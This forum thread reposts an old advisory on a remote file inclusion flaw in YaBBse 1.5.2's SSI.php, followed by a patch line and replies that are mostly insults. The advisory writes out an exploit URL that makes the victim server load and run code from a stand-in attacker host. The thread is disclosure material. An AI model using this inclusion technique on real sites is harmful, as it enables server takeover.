Remote code execution in YaBBse 1.5.2 (php version)

[CourtneyDS]

Remote code execution in YaBBse 1.5.2 (php version)

======[ Overview
YaBB is widely used bulletin board system.




======[ Problem
One of the files that are included in main application is vulnerable
to remote code execution if it is accessed directly with certain
parameters.
Name of the file is SSI.php.
Simmilar bug was discovered in previous version YaBB 1.5.1.


SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');
------------------------------------------


We can define $sourcedir variable through URL and include some other PHP script local or remote if remote inclusion is enabled in php.ini file ...
Bug in not exploitable if PHP's registar_globals is set to off ...


======[ Exploit


Exploit would look like this:

http://www.victim.com/yabbse/ssi.php?sourcedir=http://www.attacker.com



Attacker would place an Errors.php file on his server ... The code included would get executed on victim's server ...
Attacker's httpd server should not have php enabled because the
script will be parsed before sending it to the victim ...


======[ Solution


Add this line before include_once() lines mentioned above.



if (!isset($sourcedir)) $sourcedir = "";


======[ Greetz ]======
Greetz goes to hr.hackers and linux .
Special greetz goes to (rand()): BoyScout, h4z4rd, Çòùrtnèy, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.

** Credit to eLtorO **


Sincerely
CourtneyDS

 

[Iowa]

Just out of interest,who the heck is 'eltoro'?

 

[David Lindon]

Thanks for the warning court.

 

[CourtneyDS]

rocker_nash

Just out of interest,who the heck is 'eltoro'?

^^ Personally if I were you.. (15 year old high school kid).. pick up a book and learn and dont concern yourself with who is who.. ok little boy ...:

--------------------------------------------------
David :

Thanks for the warning court.

^^ Your more then welcome David ... PHP is a very weak code as some rate it as the ultimate ... <<>> How can it be rated "Tops" when their entire database can be wiped-out in under 12 key strokes ?

Sincerely
CourtneyDS

 

[webcamguy]

damn, even i can do it up on yabb and mysql

 

[eyelfixit]

Dought it, there's patches out there and this is extremly old info.

 

[webcamguy]

whats she gonna do, tell ya how to do new stuff. damb eyelfixit, ur dumber then you look dude! shut up cuz peeps know you dont know sheout n jus copy n paste to make urself look smart.

 

[eyelfixit]

The day you understand that you can't bully me and your quite beneth me is the day you'll wake up.

All of this is wack including your responses, she give's out old redundat information ann you praise her. I think your the one that needs to learn something.

 

[webcamguy]

The day you understand that you can't bully me and your quite beneth me is the day you'll wake up.

All of this is wack including your responses, she give's out old redundat information ann you praise her. I think your the one that needs to learn something.

how ya bully n ignorant arse like you, ya laugh at em like peeps at you whenever you post sheoit like you know what ur takin about. n the chick aint gonna post new exploits, ah ha ha ha ha damb ur dumb eyelfixit

 

[eyelfixit]

Can you speak english cause I really can't follow your "slang" .

What your saying doesn't make any sense, again!